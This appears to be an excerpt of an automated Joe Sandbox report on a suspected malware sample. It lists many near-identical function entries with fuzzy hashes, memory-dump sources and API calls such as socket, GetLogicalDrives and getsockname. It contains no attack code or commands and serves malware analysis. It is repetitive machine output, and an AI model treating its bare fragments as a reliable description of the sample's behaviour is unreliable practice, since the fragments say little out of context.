                                                        • Instruction ID: d57780824c6686059cdbec8c5fec1473337f87a660b742fe36f77a21543b7726
                                                        • Opcode Fuzzy Hash: d3abacb5cc9b4008f87a22f84e3caff0a6f0ee02f6d944e0ae5946802a86da4a
                                                        • Instruction Fuzzy Hash: 1F1138B1A043047BD1209A14BC4AF2B3B9CDBC6B2DF44096DBC0953343D6689C0482B6

                                                        Control-flow Graph

                                                        • Graph not reproduced (rendered as an image in the report): entry block 4575e0-4575ed, basic blocks through 457643-457699; API call socket (block 457607-457629); internal calls to 4572a0, 45cb20, 7d8c50.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: socket
                                                        • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                        • API String ID: 98920635-842387772
                                                        • Opcode ID: 5f1c55fd49a8fe027c07a0fb5bbd83a71b3ff5bbdd6ed49513101bef023aeb3f
                                                        • Instruction ID: a64ac47e95ce69f9a685edc331cbad9fcd95d4b1738a7556d85b2b866189f96f
                                                        • Opcode Fuzzy Hash: 5f1c55fd49a8fe027c07a0fb5bbd83a71b3ff5bbdd6ed49513101bef023aeb3f
                                                        • Instruction Fuzzy Hash: 60112976A102113BD6205629BC56F8B3B99DBC1B39F440929F814932D3D7198D58C2E7

                                                        Control-flow Graph

                                                        • Graph not reproduced (rendered as an image in the report): entry block 71b000b-71b0012, basic blocks through 71b046b-71b06dc; API call GetLogicalDrives (block 71b0026-71b0460); internal calls to 71b0193, 71b044e, 71b05f1.
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 41ee81ede04aa40e0ae25bd0b24955a05adedaa18c1b61653c0dbcc75c6cb297
                                                        • Instruction ID: 979e007bf5840a0a8bfc49d9b6dd3701446a8831b2010f09850a3f48d178f895
                                                        • Opcode Fuzzy Hash: 41ee81ede04aa40e0ae25bd0b24955a05adedaa18c1b61653c0dbcc75c6cb297
                                                        • Instruction Fuzzy Hash: 6A91A3EB26C111BD712A85422F64AFB676DE1CF770B32846BF807D6582E3994F8D5032

                                                        Control-flow Graph

                                                        • Graph not reproduced (rendered as an image in the report): entry block 71b006c-71b006f, basic blocks through 71b046b-71b06dc; API call GetLogicalDrives (block 71b0077-71b0460); internal calls to 71b0193, 71b044e, 71b05f1.
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 36210419e3f2fec48cde6f8aac8c9aa01c55ce820980fb738adc5c773647e1d7
                                                        • Instruction ID: 9619d1438623c46c4d395b804df9b101c5a44c9e3a304f4b3fc58c05865374e6
                                                        • Opcode Fuzzy Hash: 36210419e3f2fec48cde6f8aac8c9aa01c55ce820980fb738adc5c773647e1d7
                                                        • Instruction Fuzzy Hash: D091B5EB26C111BD712A85422F649FB576DE1CF770B32842BF807D5582E3944E8D5032
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 8720e364afd9117849ca7cb9031f61e26b6467b0163750074b83846a0c9c067e
                                                        • Instruction ID: 60c951cc5cd1a975b81af3cd9b841ec34d832d6dccee3612dbb28704f8fd7306
                                                        • Opcode Fuzzy Hash: 8720e364afd9117849ca7cb9031f61e26b6467b0163750074b83846a0c9c067e
                                                        • Instruction Fuzzy Hash: DA9172EB26C111BD712A85422F64AFB676DE1CF770B33846BF807D6582E3994E8D5032
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 273b3843272ee4189ba7a6eb8faf0bc175a6a9eb3225ae340fce51b41f38a78d
                                                        • Instruction ID: ac82473ee78caa713aa559c2a32fec3fda01b6c99c476db7341489e653bd346b
                                                        • Opcode Fuzzy Hash: 273b3843272ee4189ba7a6eb8faf0bc175a6a9eb3225ae340fce51b41f38a78d
                                                        • Instruction Fuzzy Hash: 939171EB26C111BD712A85422F64AFB676DE1CF770B32846BF807D6582E3994E8D5032
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: c84f4db07a689a16df8db9506037252a53ca0e868e34294868b4500427f4d182
                                                        • Instruction ID: 7938c028a6a001bdd938bb343cf56570726a030e526cdb7ee812d02a9c6ea9b8
                                                        • Opcode Fuzzy Hash: c84f4db07a689a16df8db9506037252a53ca0e868e34294868b4500427f4d182
                                                        • Instruction Fuzzy Hash: 5A9182EB26C111BD712A85422F64AFB676DE1CF770B32842BF807D6582E3994E8D5032
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 54647cf5fc265773dff34eb03f4b5ccd43a764bb93adb793e279fdaf06dfeeaa
                                                        • Instruction ID: 82c4a9f3c98d61c5e6670cb8de7715f4f85445bfcbf8a9f2124bd7792949c29a
                                                        • Opcode Fuzzy Hash: 54647cf5fc265773dff34eb03f4b5ccd43a764bb93adb793e279fdaf06dfeeaa
                                                        • Instruction Fuzzy Hash: 3181E5EB22C211BD712A84522BA49FB676DE5CF730B33846BF807D56C2E3944B8D5132
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 0067becf4b320206fc506d8d70dbafb25cdbb0ec775e01183da1571ce927acb5
                                                        • Instruction ID: 72c035a7fdddd084443fb6d942ea2e18ea7ffe6eb4abb510693ea3e217ad9db8
                                                        • Opcode Fuzzy Hash: 0067becf4b320206fc506d8d70dbafb25cdbb0ec775e01183da1571ce927acb5
                                                        • Instruction Fuzzy Hash: C071E9FB26C111BD712A85522BA4AFB576DE5CF730B33846BF807D5581E3984E8D5032
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 08fdbe47bb22af6e2c4e27e9e4716ccac302bd5ef334ceeb2c97e0244e8db388
                                                        • Instruction ID: bf56f8edecf6c98709a2c69179aaa051a5d822ccfd0db03d8e8bf9ee306a7c82
                                                        • Opcode Fuzzy Hash: 08fdbe47bb22af6e2c4e27e9e4716ccac302bd5ef334ceeb2c97e0244e8db388
                                                        • Instruction Fuzzy Hash: 9F71C6EB22C111BD712A81522FA5AFB576DE5CF730B33856BF807D56C2E3984A8D5032
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 0c03448e97c673d81c281e91f16b006e269aaa122efdd623e4bd28860dfc945e
                                                        • Instruction ID: e9204d110899c7427f762d8fa21ccddd79c1458f9f1c4ea99b661de98f882516
                                                        • Opcode Fuzzy Hash: 0c03448e97c673d81c281e91f16b006e269aaa122efdd623e4bd28860dfc945e
                                                        • Instruction Fuzzy Hash: 1E71B5FB22C111BD712A85422BA49FB676DE5CF730B32846BF807D5581E3984A8D5132
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: f64a1d11c3a679ab69b901edd5f8264a06b20baff4fdd815749e7b9d98d0e13a
                                                        • Instruction ID: 39c4ff281380af1c120acd3dc5f834cb716e0d635f174611c155267ba2a76e0d
                                                        • Opcode Fuzzy Hash: f64a1d11c3a679ab69b901edd5f8264a06b20baff4fdd815749e7b9d98d0e13a
                                                        • Instruction Fuzzy Hash: A271C7FB22C111BD712A85422BA4AFB576DE5CF730B33846BF807D5581E3984B8D5032
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: b739106a2bdd544eef3bcd530e01577086ba84070c6baa23bcb5195703cdeacd
                                                        • Instruction ID: fa6901e15383394148346a06f490fc544c73c0cb54717b8f3ce610e64361b773
                                                        • Opcode Fuzzy Hash: b739106a2bdd544eef3bcd530e01577086ba84070c6baa23bcb5195703cdeacd
                                                        • Instruction Fuzzy Hash: C271E8FB22C111BD722A85422BA49FB576DE5CF730B33846BF407C5681E3944B8D5132
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 3b33d07394e79e4c7d6f5aa1f9d5e9d52258b020f85f43b1f5cd6282b65e3237
                                                        • Instruction ID: d293ab4836298d81c5366cdf860eb64cee6123c9f8fcda63b8d4ba36039ebbb8
                                                        • Opcode Fuzzy Hash: 3b33d07394e79e4c7d6f5aa1f9d5e9d52258b020f85f43b1f5cd6282b65e3237
                                                        • Instruction Fuzzy Hash: 0B711AEB12C111BD712A85512BA49FB6B6DE5CF730B33846BF407D5681E3984E8D5032
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: abc04cbf2ca92eb0ae69f5c9e0dbf5eeddcc76f3b077b168a767b331bcac3f88
                                                        • Instruction ID: 7d2824fd1e4188f018f68184e34b5d6c092b17f1db082fe5203bafe64111d9e7
                                                        • Opcode Fuzzy Hash: abc04cbf2ca92eb0ae69f5c9e0dbf5eeddcc76f3b077b168a767b331bcac3f88
                                                        • Instruction Fuzzy Hash: BC6108FB12C111BD722A84522B949FB676DE5CF730B33847BF407C6A82E3944A8D5132
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 268afe00af9192b559bca0c711ceb978acaf411fae1961122147f6dfe06d201d
                                                        • Instruction ID: d35368481815e87bbe33f352fbc3618c27195ddcf1ff3a822300e0eda025f393
                                                        • Opcode Fuzzy Hash: 268afe00af9192b559bca0c711ceb978acaf411fae1961122147f6dfe06d201d
                                                        • Instruction Fuzzy Hash: AB61D5EB12C111BD722A85522BA49FB576DE5CF730B33846BF807D1A82E3984F8D5132
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 9000d83bb91b0cdfd2f53cd8abc3f8237c10056f325cae4e458274c8a85ef320
                                                        • Instruction ID: fa5652162b3f899c85c0b62834cc0f9d2a012bdcb65e667c57267db25ec9b504
                                                        • Opcode Fuzzy Hash: 9000d83bb91b0cdfd2f53cd8abc3f8237c10056f325cae4e458274c8a85ef320
                                                        • Instruction Fuzzy Hash: ED51C6FB12C211BE722A85512B649FB676DE5CF730B33856BF407D1682E3944A8D5132
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: b1ee182ae5bbfd6a290c2619dd57f64794b5a910a717406961f9a115151fd212
                                                        • Instruction ID: e4c6f6d7375a4bc3782b92f52894c2909cde8c04377b97778ba75b95f2a1548a
                                                        • Opcode Fuzzy Hash: b1ee182ae5bbfd6a290c2619dd57f64794b5a910a717406961f9a115151fd212
                                                        • Instruction Fuzzy Hash: 0151F7FB12C111BD722A85522BA49FB576DE5CF730B338567F807D1A82E3984B8D5132
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: 41999a05e368ea38a2490a9c6a20dba837377a16caebd43137339e8517f02fc4
                                                        • Instruction ID: bfb4b57bd328e6cb7ef5780f2b7212c39e247aae4bb4a19af23d9856e2baa4d5
                                                        • Opcode Fuzzy Hash: 41999a05e368ea38a2490a9c6a20dba837377a16caebd43137339e8517f02fc4
                                                        • Instruction Fuzzy Hash: 4851D7FB12C111BD722A85522B54AFB576DE5CF730B338467F407D5A82E3984B8D5132
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: ea7923ab8f248120765cc481989a227f8e55dc404584d2fe5488566db272b79a
                                                        • Instruction ID: 595aa064ff86f24d949784dca440694f652fe8fdcd2cdc7603906e37a10138e5
                                                        • Opcode Fuzzy Hash: ea7923ab8f248120765cc481989a227f8e55dc404584d2fe5488566db272b79a
                                                        • Instruction Fuzzy Hash: F851D9FB12C211BE722A85512BA49FB676DE5CF730B32857BF407D5982D3980B8D5132
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 01fc43db7e159df73840f5a5d4596791dfd3f263dcadaeeb5b0b18daa35b85e4
                                                        • Instruction ID: 38f17b7b4dd926382fde5c3913d1212faa1f6b888b15e411f0f1361a74b7fb21
                                                        • Opcode Fuzzy Hash: 01fc43db7e159df73840f5a5d4596791dfd3f263dcadaeeb5b0b18daa35b85e4
                                                        • Instruction Fuzzy Hash: 0A51D5FB22C211BD722A80562B649FB5B6DE5CF730B328577F803D5982E3984B8D5032
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 2852aaa4b03531484b77905202d363e246a71d7a34f0a7bafa26c1ea7b647f41
                                                        • Instruction ID: c332493957975738b286008a31fe3e7882f71c6898c684b978099742be178b2c
                                                        • Opcode Fuzzy Hash: 2852aaa4b03531484b77905202d363e246a71d7a34f0a7bafa26c1ea7b647f41
                                                        • Instruction Fuzzy Hash: 3C51D5FB22C211BD722A84522B649FB576DE5CF730B338977F803D1581E3984A8D5032
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 707d2366ddd3dbbdac6170ec2a3146b3dfb832b5dc84415d33dda73b3eb84fb9
                                                        • Instruction ID: dd61ab712085a3227d35ae526ccbbf1744de2b0f04dd6c4ac25a4fb997820eec
                                                        • Opcode Fuzzy Hash: 707d2366ddd3dbbdac6170ec2a3146b3dfb832b5dc84415d33dda73b3eb84fb9
                                                        • Instruction Fuzzy Hash: EA51F8FB22C211BE722A85512B649FB576DE5CF730B338577F403D5981D3984A8D5032
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        • Opcode ID: c52530c2aa6b1f5a65dc04b1614b2464762faa4d44ab0107a1960cc0525f2c57
                                                        • Instruction ID: c0cb866994a20a7b40755e454513c6a9cdac5383cd2e4983501ff490c12abb01
                                                        • Opcode Fuzzy Hash: c52530c2aa6b1f5a65dc04b1614b2464762faa4d44ab0107a1960cc0525f2c57
                                                        • Instruction Fuzzy Hash: 2A51D5FB22C211BE722A85512B649FB676DE5CF730B338567F403C5981E3984A8D5032
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 071B0456
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 8b4ee3477d59c3a9009736a0944b34bed7fd10a4d92fe3fb2198fce268115da4
                                                        • Instruction ID: 79edd08d100e084425456acb55a81072e618295098cbc2016f81cee7d9252138
                                                        • Opcode Fuzzy Hash: 8b4ee3477d59c3a9009736a0944b34bed7fd10a4d92fe3fb2198fce268115da4
                                                        • Instruction Fuzzy Hash: 1F51E6F722C111BEB22A85512B649FB576DE5CF730B328567F403D1982D7984A8D5132
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        • Opcode ID: 5d98ff3c5ad6d886d7bd9d9ff413852fbf3a7c19509c6d0f0256154295e791a6
                                                        • Instruction ID: fee41b01fa18e50f9c146a9a4580fa3e2487addac30334a733f06cb8ad0eb39b
                                                        • Opcode Fuzzy Hash: 5d98ff3c5ad6d886d7bd9d9ff413852fbf3a7c19509c6d0f0256154295e791a6
                                                        • Instruction Fuzzy Hash: 1641D5FB22C111BE722A81522B649FB576DE5CF730B338567F803D1981E3984A8D5032
                                                        APIs
                                                        • getsockname.WS2_32(?,?,00000080), ref: 0048A1C6
                                                        Strings
                                                        • getsockname() failed with errno %d: %s, xrefs: 0048A1F0
                                                        • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0048A23B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: getsockname
                                                        • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                        • API String ID: 3358416759-2605427207
                                                        • Opcode ID: e332525133326d9d474adb34e3a5527a13d4dd12853c6e558849fc4f932e5864
                                                        • Instruction ID: ca09d8cb5384c57384fcb1e33c425dfbe44ac0ea4c5f259f10d8c991d6051c33
                                                        • Opcode Fuzzy Hash: e332525133326d9d474adb34e3a5527a13d4dd12853c6e558849fc4f932e5864
                                                        • Instruction Fuzzy Hash: B3210631848680BAF621AB19DC46FE773ACEF81328F040656F98853151FE76698687E7
                                                        APIs
                                                        • WSAStartup.WS2_32(00000202), ref: 0046D65B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
